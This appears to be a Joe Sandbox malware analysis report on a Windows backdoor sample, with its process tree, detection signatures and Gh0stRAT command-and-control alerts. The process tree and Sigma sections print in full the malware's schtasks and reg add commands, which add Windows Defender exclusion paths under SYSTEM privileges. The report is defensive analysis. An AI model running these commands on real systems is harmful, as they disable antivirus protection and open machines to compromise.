Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
2b687482300.6345827638.08.exe

Overview

General Information

Sample name:2b687482300.6345827638.08.exe
Analysis ID:1584369
MD5:934c8c307939cd29f7d1d434f1ad09ef
SHA1:452e15ee56888ad6424a15efc523dfc8137516b0
SHA256:3fdcdf14ff5cb781cda7b1920d229ee59b3684b1d9b1ef939d0549ae0f8815be
Tags:backdoorexemsisilverfoxwinosuser-zhuzhu0009
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
AI detected suspicious sample
Adds extensions / path to Windows Defender exclusion list (Registry)
Creates an undocumented autostart registry key
Drops PE files to the document folder of the user
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for dropped file
Overwrites code with unconditional jumps - possibly settings hooks in foreign process
PE file contains section with special chars
Sample is not signed and drops a device driver
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
Uses cmd line tools excessively to alter registry or file data
Uses schtasks.exe or at.exe to add and modify task schedules
AV process strings found (often used to terminate AV products)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to delete services
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates COM task schedule object (often to register a task for autostart)
Creates a process in suspended mode (likely to inject code)
Creates driver files
Creates files inside the driver directory
Creates files inside the system directory
Creates or modifies windows services
Detected TCP or UDP traffic on non-standard ports
Detected non-DNS traffic on DNS port
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Entry point lies outside standard sections
Found dropped PE file which has not been started or loaded
Found evasive API chain (may stop execution after checking a module file name)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Suspicious Windows Defender Folder Exclusion Added Via Reg.EXE
Sigma detected: Windows Defender Exclusions Added - Registry
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • EMp3o1.exe (PID: 5956 cmdline: C:\Users\user\Documents\EMp3o1.exe MD5: D3709B25AFD8AC9B63CBD4E1E1D962B9)
  • EMp3o1.exe (PID: 6032 cmdline: C:\Users\user\Documents\EMp3o1.exe MD5: D3709B25AFD8AC9B63CBD4E1E1D962B9)
    • cmd.exe (PID: 940 cmdline: "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7104 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • schtasks.exe (PID: 7044 cmdline: SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • schtasks.exe (PID: 6040 cmdline: SCHTASKS /Run /TN "Task1" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • schtasks.exe (PID: 728 cmdline: SCHTASKS /Delete /TN "Task1" /F MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • cmd.exe (PID: 2260 cmdline: "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 2320 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • schtasks.exe (PID: 2704 cmdline: SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • schtasks.exe (PID: 5236 cmdline: SCHTASKS /Run /TN "Task1" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • schtasks.exe (PID: 6804 cmdline: SCHTASKS /Delete /TN "Task1" /F MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • cmd.exe (PID: 2584 cmdline: "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 6348 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • schtasks.exe (PID: 5232 cmdline: SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • schtasks.exe (PID: 2656 cmdline: SCHTASKS /Run /TN "Task1" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • schtasks.exe (PID: 2332 cmdline: SCHTASKS /Delete /TN "Task1" /F MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • cmd.exe (PID: 4060 cmdline: "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"%USERPROFILE%\Documents\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 764 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • schtasks.exe (PID: 320 cmdline: SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\user\Documents\" /t REG_DWORD /d 0 /f" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • schtasks.exe (PID: 3792 cmdline: SCHTASKS /Run /TN "Task1" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • schtasks.exe (PID: 5912 cmdline: SCHTASKS /Delete /TN "Task1" /F MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • G5CQjd.exe (PID: 4548 cmdline: "C:\Program Files (x86)\G5CQjd\G5CQjd.exe" MD5: 7B6586E21FBC8F2F0BB784A1A8FC65B4)
      • cmd.exe (PID: 4176 cmdline: cmd /c echo.>c:\xxxx.ini MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 936 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cmd.exe (PID: 2084 cmdline: cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 5896 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • reg.exe (PID: 2192 cmdline: reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
  • cmd.exe (PID: 3924 cmdline: cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 4776 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • reg.exe (PID: 1320 cmdline: reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
  • cmd.exe (PID: 2360 cmdline: cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 1396 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • reg.exe (PID: 6564 cmdline: reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
  • cmd.exe (PID: 1080 cmdline: cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\user\Documents" /t REG_DWORD /d 0 /f MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 5252 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • reg.exe (PID: 6428 cmdline: reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\user\Documents" /t REG_DWORD /d 0 /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
  • G5CQjd.exe (PID: 6888 cmdline: "C:\Program Files (x86)\G5CQjd\G5CQjd.exe" MD5: 7B6586E21FBC8F2F0BB784A1A8FC65B4)
  • Cy9OUo.exe (PID: 3660 cmdline: "C:\Program Files (x86)\E2ky7uqb\Cy9OUo.exe" MD5: 7B6586E21FBC8F2F0BB784A1A8FC65B4)
  • Cy9OUo.exe (PID: 2496 cmdline: "C:\Program Files (x86)\E2ky7uqb\Cy9OUo.exe" MD5: 7B6586E21FBC8F2F0BB784A1A8FC65B4)
  • Cy9OUo.exe (PID: 5056 cmdline: "C:\Program Files (x86)\E2ky7uqb\Cy9OUo.exe" MD5: 7B6586E21FBC8F2F0BB784A1A8FC65B4)
  • G5CQjd.exe (PID: 720 cmdline: "C:\Program Files (x86)\G5CQjd\G5CQjd.exe" MD5: 7B6586E21FBC8F2F0BB784A1A8FC65B4)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Unpacked PEs

SourceRuleDescriptionAuthorStrings
5.2.EMp3o1.exe.2800000.1.unpackINDICATOR_SUSPICIOUS_DisableWinDefenderDetects executables containing artifcats associated with disabling Widnows DefenderditekSHen
  • 0x1fb0f:$e1: Microsoft\Windows Defender\Exclusions\Paths
  • 0x1fbc2:$e1: Microsoft\Windows Defender\Exclusions\Paths
  • 0x1fcd2:$e1: Microsoft\Windows Defender\Exclusions\Paths
  • 0x1fc20:$e2: Add-MpPreference -ExclusionPath

Sigma Signatures

System Summary

barindex
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F, CommandLine: "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: C:\Users\user\Documents\EMp3o1.exe, ParentImage: C:\Users\user\Documents\EMp3o1.exe, ParentProcessId: 6032, ParentProcessName: EMp3o1.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F, ProcessId: 940, ProcessName: cmd.exe
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F, CommandLine: "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: C:\Users\user\Documents\EMp3o1.exe, ParentImage: C:\Users\user\Documents\EMp3o1.exe, ParentProcessId: 6032, ParentProcessName: EMp3o1.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F, ProcessId: 940, ProcessName: cmd.exe
Sigma detected: Suspicious Windows Defender Folder Exclusion Added Via Reg.EXE
Source: Process startedAuthor: frack113: Data: Command: reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f, CommandLine: reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f, CommandLine|base64offset|contains: , Image: C:\Windows\System32\reg.exe, NewProcessName: C:\Windows\System32\reg.exe, OriginalFileName: C:\Windows\System32\reg.exe, ParentCommandLine: cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2084, ParentProcessName: cmd.exe, ProcessCommandLine: reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f, ProcessId: 2192, ProcessName: reg.exe
Sigma detected: Windows Defender Exclusions Added - Registry
Source: Registry Key setAuthor: Christian Burkard (Nextron Systems): Data: Details: 0, EventID: 13, EventType: SetValue, Image: C:\Windows\System32\reg.exe, ProcessId: 2192, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData

Suricata Signatures

TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2025-01-05T10:12:54.154885+010028529011Malware Command and Control Activity Detected192.168.2.6627888.217.47.1698917TCP
2025-01-05T10:12:56.382472+010028529011Malware Command and Control Activity Detected192.168.2.6627898.217.47.1698917TCP
2025-01-05T10:12:59.159232+010028529011Malware Command and Control Activity Detected192.168.2.6627908.217.47.1698917TCP
2025-01-05T10:13:16.082102+010028529011Malware Command and Control Activity Detected192.168.2.6627968.217.47.1698917TCP
2025-01-05T10:13:18.989525+010028529011Malware Command and Control Activity Detected192.168.2.6627978.217.47.1698917TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Antivirus detection for dropped file
Source: C:\Program Files (x86)\E2ky7uqb\tbcore3U.dllAvira: detection malicious, Label: TR/Redcap.vdzex
Source: C:\Program Files (x86)\G5CQjd\tbcore3U.dllAvira: detection malicious, Label: TR/Redcap.vdzex
Multi AV Scanner detection for submitted file
Source: 2b687482300.6345827638.08.exeVirustotal: Detection: 12%Perma Link
Source: 2b687482300.6345827638.08.exeReversingLabs: Detection: 13%
AI detected suspicious sample
Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for dropped file
Source: C:\Program Files (x86)\E2ky7uqb\tbcore3U.dllJoe Sandbox ML: detected
Source: C:\Program Files (x86)\G5CQjd\tbcore3U.dllJoe Sandbox ML: detected
Source: unknownHTTPS traffic detected: 39.103.20.34:443 -> 192.168.2.6:62735 version: TLS 1.2
Source: unknownHTTPS traffic detected: 118.178.60.9:443 -> 192.168.2.6:62780 version: TLS 1.2
Source: Binary string: d:\work\iGiveButton\toolbar4\Release_bin\uninstall.pdb source: G5CQjd.exe, 00000028.00000000.3437121582.0000000000718000.00000002.00000001.01000000.0000000A.sdmp, G5CQjd.exe, 00000029.00000002.3482527026.0000000000718000.00000002.00000001.01000000.0000000A.sdmp, G5CQjd.exe, 00000029.00000000.3464191213.0000000000718000.00000002.00000001.01000000.0000000A.sdmp, Cy9OUo.exe, 0000002A.00000000.3469206986.00000000001F8000.00000002.00000001.01000000.0000000C.sdmp, Cy9OUo.exe, 0000002A.00000002.3484346566.00000000001F8000.00000002.00000001.01000000.0000000C.sdmp, Cy9OUo.exe, 0000002D.00000002.3499578790.00000000001F8000.00000002.00000001.01000000.0000000C.sdmp, Cy9OUo.exe, 0000002D.00000000.3491990756.00000000001F8000.00000002.00000001.01000000.0000000C.sdmp, Cy9OUo.exe, 0000002E.00000000.3579031648.00000000001F8000.00000002.00000001.01000000.0000000C.sdmp, Cy9OUo.exe, 0000002E.00000002.3594006751.00000000001F8000.00000002.00000001.01000000.0000000C.sdmp, G5CQjd.exe, 0000002F.00000002.3596772792.0000000000718000.00000002.00000001.01000000.0000000A.sdmp, G5CQjd.exe, 0000002F.00000000.3584367115.0000000000718000.00000002.00000001.01000000.0000000A.sdmp, G5CQjd.exe.6.dr, Cy9OUo.exe.40.dr
Source: Binary string: c:\tools_git_priv\truesight\driver\objfre_win7_amd64\amd64\TrueSight.pdb source: 189atohci.sys.0.dr
Source: Binary string: y:\avsdk5\user\make\build\public\64-bit\vseamps.pdb source: 2b687482300.6345827638.08.exe, 00000000.00000003.2622438995.00000000048DB000.00000004.00000020.00020000.00000000.sdmp, 2b687482300.6345827638.08.exe, 00000000.00000003.2622589579.00000000048E4000.00000004.00000020.00020000.00000000.sdmp, 2b687482300.6345827638.08.exe, 00000000.00000003.2659884614.00000000048E0000.00000004.00000020.00020000.00000000.sdmp, 2b687482300.6345827638.08.exe, 00000000.00000003.2622681734.00000000048E4000.00000004.00000020.00020000.00000000.sdmp, 2b687482300.6345827638.08.exe, 00000000.00000003.2622615056.00000000048E4000.00000004.00000020.00020000.00000000.sdmp, EMp3o1.exe, 00000005.00000002.2765412481.0000000140014000.00000002.00000001.01000000.00000008.sdmp, EMp3o1.exe, 00000005.00000000.2758749263.0000000140014000.00000002.00000001.01000000.00000008.sdmp, EMp3o1.exe, 00000006.00000000.2978571160.0000000140014000.00000002.00000001.01000000.00000008.sdmp, EMp3o1.exe.0.dr

Change of critical system settings

barindex
Adds extensions / path to Windows Defender exclusion list (Registry)
Source: C:\Windows\System32\reg.exeRegistry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\ProgramDataJump to behavior
Source: C:\Windows\System32\reg.exeRegistry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\UsersJump to behavior
Source: C:\Windows\System32\reg.exeRegistry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Program Files (x86)Jump to behavior
Source: C:\Windows\System32\reg.exeRegistry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Users\user\DocumentsJump to behavior
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32Jump to behavior
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandlerJump to behavior
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32Jump to behavior
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandlerJump to behavior
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32Jump to behavior
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServerJump to behavior
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\ElevationJump to behavior
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeCode function: 5_2_00007FFDAC08A1B8 FindFirstFileExW,5_2_00007FFDAC08A1B8
Source: C:\Users\user\Documents\EMp3o1.exeFile opened: C:\Users\user\AppDataJump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet ExplorerJump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeFile opened: C:\Users\userJump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.iniJump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeCode function: 4x nop then mov rax, qword ptr [rsp+78h]5_2_000000014000DFFE
Source: C:\Users\user\Documents\EMp3o1.exeCode function: 4x nop then mov rax, qword ptr [rsp+78h]5_2_000000014000DDFF
Source: C:\Users\user\Documents\EMp3o1.exeCode function: 4x nop then movsxd rbx, qword ptr [r14+10h]5_2_0000000140011270
Source: C:\Users\user\Documents\EMp3o1.exeCode function: 4x nop then mov rax, qword ptr [rsp+78h]5_2_000000014000DE96
Source: C:\Users\user\Documents\EMp3o1.exeCode function: 4x nop then mov rax, qword ptr [rsp+78h]5_2_000000014000DEFB
Source: C:\Users\user\Documents\EMp3o1.exeCode function: 4x nop then mov rax, qword ptr [rsp+78h]5_2_000000014000E178
Source: C:\Users\user\Documents\EMp3o1.exeCode function: 4x nop then mov rax, qword ptr [rsp+78h]5_2_000000014000DDD9

Networking

barindex
Suricata IDS alerts for network traffic
Source: Network trafficSuricata IDS: 2852901 - Severity 1 - ETPRO MALWARE Backdoor/Win.Gh0stRAT CnC Checkin : 192.168.2.6:62790 -> 8.217.47.169:8917
Source: Network trafficSuricata IDS: 2852901 - Severity 1 - ETPRO MALWARE Backdoor/Win.Gh0stRAT CnC Checkin : 192.168.2.6:62796 -> 8.217.47.169:8917
Source: Network trafficSuricata IDS: 2852901 - Severity 1 - ETPRO MALWARE Backdoor/Win.Gh0stRAT CnC Checkin : 192.168.2.6:62789 -> 8.217.47.169:8917
Source: Network trafficSuricata IDS: 2852901 - Severity 1 - ETPRO MALWARE Backdoor/Win.Gh0stRAT CnC Checkin : 192.168.2.6:62788 -> 8.217.47.169:8917
Source: Network trafficSuricata IDS: 2852901 - Severity 1 - ETPRO MALWARE Backdoor/Win.Gh0stRAT CnC Checkin : 192.168.2.6:62797 -> 8.217.47.169:8917
Source: global trafficTCP traffic: 192.168.2.6:62788 -> 8.217.47.169:8917
Source: global trafficTCP traffic: 192.168.2.6:62640 -> 162.159.36.2:53
